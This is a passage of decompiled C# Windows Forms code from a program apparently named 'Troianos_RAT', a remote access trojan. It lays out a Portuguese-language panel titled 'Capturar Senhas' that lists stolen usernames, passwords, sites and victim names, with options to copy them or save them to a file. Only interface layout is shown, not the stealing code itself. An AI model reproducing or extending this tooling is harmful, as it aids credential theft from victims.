     this.CopyUseToolStripMenuItem             = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyPassToolStripMenuItem            = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopySiteToolStripMenuItem            = new global::System.Windows.Forms.ToolStripMenuItem();
     this.CopyALLToolStripMenuItem             = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SaveAllToolStripMenuItem             = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AreaDeTransferenciaToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.EmDiscoToolStripMenuItem             = new global::System.Windows.Forms.ToolStripMenuItem();
     this.FindToolStripMenuItem                = new global::System.Windows.Forms.ToolStripMenuItem();
     this.SaveFileDialog1    = new global::System.Windows.Forms.SaveFileDialog();
     this.ImageList1         = new global::System.Windows.Forms.ImageList(this.components);
     this.MenuStrip1         = new global::System.Windows.Forms.MenuStrip();
     this.ToolStripMenuItem1 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.L1            = new global::Troianos_RAT.GClass9();
     this.ColumnHeader1 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader2 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader3 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader5 = new global::System.Windows.Forms.ColumnHeader();
     this.ContextMenuStrip1.SuspendLayout();
     this.MenuStrip1.SuspendLayout();
     this.SuspendLayout();
     this.ContextMenuStrip1.BackColor = global::System.Drawing.Color.Black;
     this.ContextMenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.CopyUseToolStripMenuItem,
         this.CopyPassToolStripMenuItem,
         this.CopySiteToolStripMenuItem,
         this.CopyALLToolStripMenuItem,
         this.SaveAllToolStripMenuItem,
         this.FindToolStripMenuItem
     });
     this.ContextMenuStrip1.Name       = "ContextMenuStrip1";
     this.ContextMenuStrip1.RenderMode = global::System.Windows.Forms.ToolStripRenderMode.System;
     global::System.Windows.Forms.Control contextMenuStrip = this.ContextMenuStrip1;
     global::System.Drawing.Size          size             = new global::System.Drawing.Size(156, 158);
     contextMenuStrip.Size = size;
     this.CopyUseToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.CopyUseToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources.Untitled;
     this.CopyUseToolStripMenuItem.Name      = "CopyUseToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copyUseToolStripMenuItem = this.CopyUseToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     copyUseToolStripMenuItem.Size            = size;
     this.CopyUseToolStripMenuItem.Text       = "Copiar Usuario ";
     this.CopyPassToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.CopyPassToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources.Untitled;
     this.CopyPassToolStripMenuItem.Name      = "CopyPassToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copyPassToolStripMenuItem = this.CopyPassToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     copyPassToolStripMenuItem.Size           = size;
     this.CopyPassToolStripMenuItem.Text      = "Copiar Senha";
     this.CopySiteToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.CopySiteToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources.Untitled;
     this.CopySiteToolStripMenuItem.Name      = "CopySiteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copySiteToolStripMenuItem = this.CopySiteToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     copySiteToolStripMenuItem.Size          = size;
     this.CopySiteToolStripMenuItem.Text     = "Copiar Site";
     this.CopyALLToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.CopyALLToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources.Untitled;
     this.CopyALLToolStripMenuItem.Name      = "CopyALLToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem copyALLToolStripMenuItem = this.CopyALLToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     copyALLToolStripMenuItem.Size      = size;
     this.CopyALLToolStripMenuItem.Text = "Copiar Tudo";
     this.SaveAllToolStripMenuItem.DropDownItems.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.AreaDeTransferenciaToolStripMenuItem,
         this.EmDiscoToolStripMenuItem
     });
     this.SaveAllToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.SaveAllToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources._1332437623_Save;
     this.SaveAllToolStripMenuItem.Name      = "SaveAllToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem saveAllToolStripMenuItem = this.SaveAllToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     saveAllToolStripMenuItem.Size      = size;
     this.SaveAllToolStripMenuItem.Text = "Salvar Tudo";
     this.AreaDeTransferenciaToolStripMenuItem.BackColor             = global::System.Drawing.Color.Black;
     this.AreaDeTransferenciaToolStripMenuItem.Image                 = global::Troianos_RAT.My.Resources.Resources._1332437623_Save;
     this.AreaDeTransferenciaToolStripMenuItem.ImageTransparentColor = global::System.Drawing.Color.Transparent;
     this.AreaDeTransferenciaToolStripMenuItem.Name = "AreaDeTransferenciaToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem areaDeTransferenciaToolStripMenuItem = this.AreaDeTransferenciaToolStripMenuItem;
     size = new global::System.Drawing.Size(188, 22);
     areaDeTransferenciaToolStripMenuItem.Size      = size;
     this.AreaDeTransferenciaToolStripMenuItem.Text = "Area de Transferencia";
     this.EmDiscoToolStripMenuItem.Image            = global::Troianos_RAT.My.Resources.Resources._1332437623_Save;
     this.EmDiscoToolStripMenuItem.Name             = "EmDiscoToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem emDiscoToolStripMenuItem = this.EmDiscoToolStripMenuItem;
     size = new global::System.Drawing.Size(188, 22);
     emDiscoToolStripMenuItem.Size        = size;
     this.EmDiscoToolStripMenuItem.Text   = "Em Disco";
     this.FindToolStripMenuItem.ForeColor = global::System.Drawing.Color.White;
     this.FindToolStripMenuItem.Image     = global::Troianos_RAT.My.Resources.Resources.pesquisa1;
     this.FindToolStripMenuItem.Name      = "FindToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem findToolStripMenuItem = this.FindToolStripMenuItem;
     size = new global::System.Drawing.Size(155, 22);
     findToolStripMenuItem.Size       = size;
     this.FindToolStripMenuItem.Text  = "Procurar";
     this.SaveFileDialog1.FileName    = "Senha.txt";
     this.SaveFileDialog1.Filter      = "|.txt";
     this.ImageList1.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
     this.ImageList1.TransparentColor = global::System.Drawing.Color.Transparent;
     this.ImageList1.Images.SetKeyName(0, "1.bmp");
     this.ImageList1.Images.SetKeyName(1, "2.bmp");
     this.ImageList1.Images.SetKeyName(2, "3.bmp");
     this.ImageList1.Images.SetKeyName(3, "4.bmp");
     this.ImageList1.Images.SetKeyName(4, "5.bmp");
     this.ImageList1.Images.SetKeyName(5, "6.bmp");
     this.ImageList1.Images.SetKeyName(6, "7.bmp");
     this.ImageList1.Images.SetKeyName(7, "8.bmp");
     this.ImageList1.Images.SetKeyName(8, "9.bmp");
     this.ImageList1.Images.SetKeyName(9, "10.bmp");
     this.ImageList1.Images.SetKeyName(10, "11.bmp");
     this.ImageList1.Images.SetKeyName(11, "12.bmp");
     this.ImageList1.Images.SetKeyName(12, "13.bmp");
     this.MenuStrip1.BackColor = global::System.Drawing.Color.Black;
     this.MenuStrip1.Dock      = global::System.Windows.Forms.DockStyle.Bottom;
     this.MenuStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.ToolStripMenuItem1
     });
     global::System.Windows.Forms.Control menuStrip = this.MenuStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 222);
     menuStrip.Location   = location;
     this.MenuStrip1.Name = "MenuStrip1";
     global::System.Windows.Forms.Control menuStrip2 = this.MenuStrip1;
     size                              = new global::System.Drawing.Size(675, 24);
     menuStrip2.Size                   = size;
     this.MenuStrip1.TabIndex          = 1;
     this.MenuStrip1.Text              = "MenuStrip1";
     this.ToolStripMenuItem1.Font      = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold, global::System.Drawing.GraphicsUnit.Point, 0);
     this.ToolStripMenuItem1.ForeColor = global::System.Drawing.Color.White;
     this.ToolStripMenuItem1.Name      = "ToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem toolStripMenuItem = this.ToolStripMenuItem1;
     size = new global::System.Drawing.Size(60, 20);
     toolStripMenuItem.Size       = size;
     this.ToolStripMenuItem1.Text = "Senhas";
     this.L1.BackColor            = global::System.Drawing.SystemColors.InfoText;
     this.L1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader1,
         this.ColumnHeader2,
         this.ColumnHeader3,
         this.ColumnHeader4,
         this.ColumnHeader5
     });
     this.L1.ContextMenuStrip = this.ContextMenuStrip1;
     this.L1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L1.Font             = new global::System.Drawing.Font("Arial", 8.25f, global::System.Drawing.FontStyle.Bold);
     this.L1.ForeColor        = global::System.Drawing.Color.White;
     this.L1.FullRowSelect    = true;
     global::System.Windows.Forms.Control l = this.L1;
     location          = new global::System.Drawing.Point(0, 0);
     l.Location        = location;
     this.L1.Name      = "L1";
     this.L1.OwnerDraw = true;
     global::System.Windows.Forms.Control l2 = this.L1;
     size    = new global::System.Drawing.Size(675, 222);
     l2.Size = size;
     this.L1.SmallImageList = this.ImageList1;
     this.L1.TabIndex       = 2;
     this.L1.UseCompatibleStateImageBehavior = false;
     this.L1.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader1.Text  = "Usuario :";
     this.ColumnHeader1.Width = 115;
     this.ColumnHeader2.Text  = "Senha :";
     this.ColumnHeader2.Width = 93;
     this.ColumnHeader3.Text  = "Site :";
     this.ColumnHeader3.Width = 93;
     this.ColumnHeader4.Text  = "Programa :";
     this.ColumnHeader4.Width = 95;
     this.ColumnHeader5.Text  = "Nome da Vitima :";
     this.ColumnHeader5.Width = 275;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.AutoSizeMode        = global::System.Windows.Forms.AutoSizeMode.GrowAndShrink;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(675, 246);
     this.ClientSize = size;
     this.Controls.Add(this.L1);
     this.Controls.Add(this.MenuStrip1);
     this.Icon          = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
     this.MainMenuStrip = this.MenuStrip1;
     this.MaximizeBox   = false;
     this.MinimizeBox   = false;
     this.Name          = "Pass";
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Capturar Senhas";
     this.ContextMenuStrip1.ResumeLayout(false);
     this.MenuStrip1.ResumeLayout(false);
     this.MenuStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }